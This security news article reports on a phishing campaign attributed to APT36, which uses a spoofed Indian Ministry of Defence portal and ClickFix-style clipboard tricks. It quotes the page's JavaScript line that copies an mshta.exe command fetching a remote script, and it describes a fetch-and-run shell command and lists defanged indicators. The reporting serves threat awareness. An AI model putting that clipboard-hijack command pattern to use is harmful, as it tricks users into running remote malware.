APT36 Suspected in India Gov Spoofing Phishing with ClickFix Tactics

Hunt.io, a threat hunting platform, has revealed a sophisticated phishing campaign using ClickFix-style tactics and spoofed Indian government branding to lure victims on both Windows and Linux platforms. The attack infrastructure, closely mimicking India’s Ministry of Defence, points to a possible return of APT36, the Pakistan-aligned threat group also known as Transparent Tribe.

“Threat actors continue to adopt recognizable branding and official imagery to lower suspicion and facilitate malware execution,” the report notes.

The campaign is centered around a cloned Ministry of Defence portal hosted at email.gov.in.drdosurvey[.]info. The replica page mimics the legitimate press release section of the ministry, but contains only one clickable link—March 2025—designed to trigger the infection chain.

Upon clicking the March 2025 link, users are redirected to different payloads depending on their OS:

• Linux users land on /captcha/linux.php
• Windows users are taken to /captcha/windows.php

The Linux variant displays a simplistic CAPTCHA screen with a blue button labeled “I’m not a rebot”—a spelling anomaly possibly designed to evade automated scanners.

Clicking the button copies a shell command to the clipboard that downloads and executes mapeal.sh from a suspicious domain:
https://trade4wealth[.]in/admin/assets/js/

The script’s only observed action was to fetch and display a JPEG image, suggesting the payload may still be in development or part of a multi-stage infection.

On Windows, users are shown a “For Official Use Only” overlay with a blurred background of India’s AYUSH Ministry site. Clicking “Continue” silently copies a malicious mshta.exe command to the clipboard:

const calcPath = "C:\\Windows\\System32\\mshta.exe https://trade4wealth[.]in/admin/assets/css/default/index.php"; navigator.clipboard.writeText(calcPath)

This launches a remote script, which redirects to a heavily obfuscated HTA file (sysinte.hta). Dynamic analysis revealed a .NET-based loader that establishes contact with 185.117.90[.]212—also linked to the spoofed domain email.gov.in.avtzyu[.]store.

The malware executes in the background while showing a decoy document—an actual press release—adding to the illusion of legitimacy.

The report suggests medium confidence attribution to APT36 (Transparent Tribe) based on the following factors:

• Reuse of government-themed lures
• Clipboard-based ClickFix execution
• HTA and .NET-based delivery mechanisms
• Focus on Indian government and defense personnel

“While attribution remains unconfirmed, the tradecraft observed… is consistent with historic activity attributed to APT36,” the report concludes.

Related Posts:

• Beyond Firewalls: NCSC Explores Cyber Deception’s Potential
• Hackers Fake ChatGPT App to Spread Windows, and Android Malware
• State-Sponsored Actors Adopt ClickFix Technique in Cyber Espionage
• Transparent Tribe Targets Indian Government and Defense Sectors with Evolving Cyber Espionage Tactics